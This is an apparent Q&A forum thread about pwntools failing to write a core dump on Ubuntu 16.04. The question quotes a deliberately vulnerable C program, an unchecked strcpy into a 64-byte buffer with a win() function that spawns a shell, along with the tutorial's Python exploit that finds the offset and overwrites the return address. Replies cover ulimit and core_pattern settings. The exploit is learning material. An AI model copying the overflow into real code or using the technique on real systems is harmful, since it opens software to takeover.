# Pwntools can't create core file

Tags: python, ubuntu

I'm trying to use [pwntools](https://github.com/Gallopsled/pwntools) and I'm following this tutorial for [creating Corefiles to automate exploitation](http://docs.pwntools.com/en/stable/elf/corefile.html#module-pwnlib.elf.corefile).

The code of the *./crash* executable is:

```
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void win() {
    system("sh");
}
int main(int argc, char** argv) {
    char buffer[64];
    strcpy(buffer, argv[1]);
}
```

After `ulimit -c unlimited` if I run the executable (from bash) with an big enough input it will crash and it generates the core files.

Using pwntools:

```
from pwn import *

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128)

# Run the process once so that it crashes
process(['./crash', payload]).wait()

# Get the core dump
core = Coredump('./core')

# Our cyclic pattern should have been used as the crashing address
assert pack(core.eip) in payload

# Cool! Now let's just replace that value with the address of 'win'
crash = ELF('./crash')
payload = fit({
    cyclic_find(core.eip): crash.symbols.win
})

# Get a shell!
io = process(['./crash', payload])
io.sendline('id')
print io.recvline()
# uid=1000(user) gid=1000(user) groups=1000(user)
```

If I run this script (from bash, both from my user and from root) with the same big input, it will crash, but it doesn't generate the core file.

I also tried to edit the `/etc/sysctl.conf` file and I set `fs.suid_dumpable = 1`

My os is an Ubuntu 16.04.3 LTS x64 with an 4.4.0-89-generic kernel.

Answer (score 0):

You've not shown us how you've told the OS to handle core dumps.

The max size is configure via `ulimit -c $MAXSIZEINBLOCKS` (note that ulimit has soft and hard values). $MAXSIZEINBLOCKS should be an integer or the string 'unlimited'

You also need to tell the OS where to put the core dumps - this is done via [sysctl](https://www.bitdefender.com/support/logging-kernel-core-dumps-642.html). e.g. `sysctl -w kernel.core_pattern=/var/crash/core.%p.%u.%e`

It might be helpful to know that you can get a core dump from any running process (if permissions allow) using [gcore](http://man7.org/linux/man-pages/man1/gcore.1.html)

Comment: read under the C source code, I wrote that I used `ulimit -c unlimited`

anyway I set the path for the core dump and nothing changed (before this setting the core was generated in the same folder of the executable) 

I know gcore, but my need are different